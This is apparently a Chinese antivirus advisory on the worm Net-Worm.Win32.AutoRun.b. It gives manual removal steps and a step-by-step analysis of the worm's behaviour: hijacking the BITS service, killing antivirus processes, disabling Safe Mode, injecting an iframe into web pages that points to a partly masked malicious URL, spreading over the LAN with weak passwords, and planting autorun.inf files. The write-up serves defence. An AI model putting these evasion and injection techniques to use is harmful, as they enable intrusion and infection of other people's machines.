網絡蠕蟲Net-Worm.Win32.AutoRun.b的處理方法
1、手動恢複以下文件:
拷貝相同版本文件到: %SystemRoot%\system32\qmgr.dll
拷貝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
手動或用工具清除所有壓縮包中的病毒
手動或用工具恢複所有網頁文件。
2、手動刪除以下文件:
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X爲所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X爲所有盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X爲所有盤符)
3、手動刪除以下注冊表值:
鍵: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\[所有劫持]
4、手動恢複以下注冊表值:
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
值: Start
數據: 0x00000003
修複安全模式:
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
鍵:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
變量聲明:
%SystemDriver% 係統所在分區,通常爲“C:\”
%SystemRoot% WINDODWS所在目錄,通常爲“C:\Windows”
%Documents and Settings% 用戶文檔目錄,通常爲“C:\Documents and Settings”
%Temp% 臨時文件夾,通常爲“C:\Documents and Settings\當前用戶名稱\Local Settings\Temp”
%ProgramFiles% 係統程序默認安裝目錄,通常爲:“C:\ProgramFiles”
病毒分析
(1)停止名爲"BITS"的服務,去掉%SystemRoot%\system32\qmgr.dll文件保護屬性,並釋放動態鏈接
庫%SystemRoot%\system32\qmgr.dll,替換掉正常的qmgr.dll,啓動"BITS"服務,通過該服務加載病毒程序。
(2)檢查%SystemRoot%\system32\qmgr.dll是否被360tray.exe檢測,如果是,則創建一個名爲"360SpShadow0"的設備,通過發送IO控
制碼的方式控制該設備從而繞過360tray.exe的檢測。
(3) 創建線程,獲取當前進程快照,查找進程"avp.exe"、"bdagent.exe"、"360tray.exe"是否存在,如果找到,則
將%SystemRoot%\system32\qmgr.dll複制爲%SystemRoot%\system32\1l1.dll,將%SystemRoot%\system32\1l1.dll注入到目標進
程空間,並將殺軟進程主線程終止,使其進程退出,完成之後,刪除%SystemRoot%\system32\1l1.dll。
(4)創建線程,刪除注冊表相關鍵值,使用戶無法進入安全模式,創建名爲"SvcMain"的服務,釋放驅動%TEMP%\SvcMain.sys並加載,
通過該驅動程序恢複SSDT,完成之後,刪除%TEMP%\SvcMain.sys,並刪除服務對應的注冊表鍵值。之後,刪除大部分殺軟的服務,
並作鏡像劫持。
(5)創建線程,查找所有文件後綴名爲htm、html、asp、aspx的網頁文件,如果找到,往目標文件中插入代碼<iframe
src=http://mm.uu8***7.cn/index/mm.htm width=100 height=0></iframe>,並開啓一個新進程執行%ProgramFiles%\Internet
Explorer\iexplore.exe,通過iexplore.exe訪問嵌入的惡意網址。
(6)創建線程,新建文件%TEMP%\TempLocal.txt,訪問目標網址讀取內容,將讀取的內容寫入TempLocal.txt,並訪問TempLocal.txt文
件中保存的網址,下載新病毒到本地運行。
(7)查找並修改文件%SystemRoot%\System32\drivers\etc\hosts。
(8)釋放文件%SystemRoot%\System32\dllcache\lsasvc.dll,並運行。
(9)創建線程,遍曆所有盤符,查找所有rar壓縮包文件,如果找到,通過調用%ProgramFiles%\WinRAR\Rar.exe程序將其解壓,將 病毒程序複制到解壓出的文件夾中,然後再壓縮回去,完成將病毒添加到壓縮包中的功能。
(10)創建線程,掃描局域網其它主機,並通過自帶的弱口令列表嘗試枚舉其它主機的管理密碼,如果枚舉成功,從指定網址下載病毒程
序到本地執行,並複制到其它主機的所有共享文件夾中運行。
(11)創建線程,遍曆當前所有盤符,在每個盤符下創建文件autorun.inf,並在每個盤符下創建文件夾recycle.{645FF040-5081-101B-9F08-00AA002F954E},並將%SystemRoot%\System32\dllcache\lsasvc.dll重命名爲Ghost.exe複制到
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,使用戶一但雙擊磁盤或打開資源管理器自動運行病毒Ghost.exe
(12)創建線程,不斷讀取%TEMP%\TempLocal.txt文件中的網址,下載新病毒。
(13)創建線程,釋放病毒程序%TEMP%\syshost.exe,並開啓新進程執行該程序。
(14) 釋放批處理文件%TEMP%\TempDel.bat,並運行,將病毒自身重命名複制到%SystemRoot%\system32\dllcache\lsasvc.dll,之後刪除自身和TempDel.bat。
病毒創建文件:
%TEMP%\SvcMain.sys
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%TEMP%\TempDel.bat
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X爲各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X爲各個盤符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X爲各個盤符)
病毒修改文件:
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\system32\drivers\etc\hosts
病毒刪除文件:
%TEMP%\SvcMain.sys
%TEMP%\TempDel.bat
病毒創建進程:
iexplore.exe
病毒創建注冊表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[映像劫持]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
病毒修改注冊表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ BITS\Start
病毒刪除注冊表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
病毒訪問網絡:
http://m...uu***67.cn/index/mm.htm
http://w....d***04.com/msn/mm.txt
http://w....d***567.cn/down/qqmm.exe
http://w....d***567.cn/down/qqma.exe
